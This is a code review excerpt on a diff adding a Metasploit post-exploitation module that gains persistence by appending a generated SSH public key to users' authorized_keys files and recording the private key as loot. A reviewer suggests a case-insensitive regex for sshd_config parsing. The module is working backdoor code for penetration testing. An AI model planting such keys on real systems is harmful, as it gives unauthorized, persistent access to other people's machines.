modules/exploits/multi/persistence/sshkey.rb

```diff
@@ -0,0 +1,313 @@
+
+    if session.platform == 'windows'
+      'C:\ProgramData\ssh\sshd_config'
+    else # assume *nix
+      '/etc/ssh/sshd_config'
+    end
+  end
+
+  def set_pub_key_file_permissions(file)
+    if session.platform == 'windows'
+      cmd_exec("icacls #{file} /inheritance:r")
+      cmd_exec("icacls #{file} /grant SYSTEM:(F)")
+      cmd_exec("icacls #{file} /grant BUILTIN\\Administrators:(F)")
+    else
+      chmod(file, 0o600)
+    end
+  end
+
+  def windows_service_owner
+    service_info = cmd_exec('sc qc sshd')
+    /SERVICE_START_NAME\s+: (?<owner>.+)/ =~ service_info
+    owner
+  end
+
+  def write_key(paths, auth_key_file, sep)
+    if datastore['PUBKEY'].nil?
+      key = SSHKey.generate(bits: 4096) # https://github.com/bensie/sshkey/issues/41
+      our_pub_key = key.ssh_public_key
+      private_key_path = store_loot('id_rsa', 'text/plain', session, key.private_key, 'ssh_id_rsa', 'OpenSSH Private Key File')
+      print_good("Storing new private key as #{private_key_path}")
+    else
+      our_pub_key = ::File.read(datastore['PUBKEY'])
+    end
+
+    paths.each do |path|
+      path.chomp!
+      authorized_keys = "#{path}#{sep}#{auth_key_file}"
+      # make a backup of the authorized_keys file so we can add it to the restore rc
+      auth_keys_backup = read_file(authorized_keys)
+      loot_path = store_loot('authorized_keys', 'text/plain', session, auth_keys_backup, 'authorized_keys', 'SSH Authorized Keys File')
+      @clean_up_rc << "upload #{loot_path} #{authorized_keys}\n"
+      # start exploiting
+      print_status("Adding key to #{authorized_keys}")
+      append_file(authorized_keys, "\n#{our_pub_key}")
+      if session.platform != 'windows' && !writable?(authorized_keys)
+        chmod(authorized_keys, 0o700)
+      end
+      set_pub_key_file_permissions(authorized_keys)
+      print_good "Persistence installed! Call a shell using 'ssh -i #{private_key_path} <username>@#{session.session_host}'"
+      print_good 'use auxiliary/scanner/ssh/ssh_login'
+      print_good "  run KEY_PATH=#{private_key_path} RHOSTS=#{session.session_host} USERNAME=<username>"
+      next unless datastore['PUBKEY'].nil?
+
+      path_array = path.split(sep)
+      path_array.pop
+      user = path_array.pop
+      credential_data = {
+        origin_type: :session,
+        session_id: session.db_record.id,
+        post_reference_name: refname,
+        private_type: :ssh_key,
+        private_data: key.private_key.to_s,
+        username: user,
+        workspace_id: myworkspace_id
+      }
+
+      create_credential(credential_data)
+    end
+  end
+
+  def pubkey_enbled?
+    print_status('Checking SSH Permissions')
+    if session.platform != 'windows' && !readable?(sshd_config_file)
+      return nil
+    end
+
+    sshd_config = read_file(sshd_config_file)
+    return nil if sshd_config.nil? || sshd_config.empty? # should catch permission errors
+
+    /^PubkeyAuthentication\s+(?<pub_key>yes|no)/ =~ sshd_config
```

Comment:
```suggestion
    /^\s*PubkeyAuthentication\s+(?<pub_key>yes|no)/i =~ sshd_config
```

Because sometimes people will simply remove the leading `#`, and `PubkeyAuthentication` might have some leading spaces. Also, as stated in `man sshd_config`:

> note that keywords are case-insensitive and arguments are case-sensitive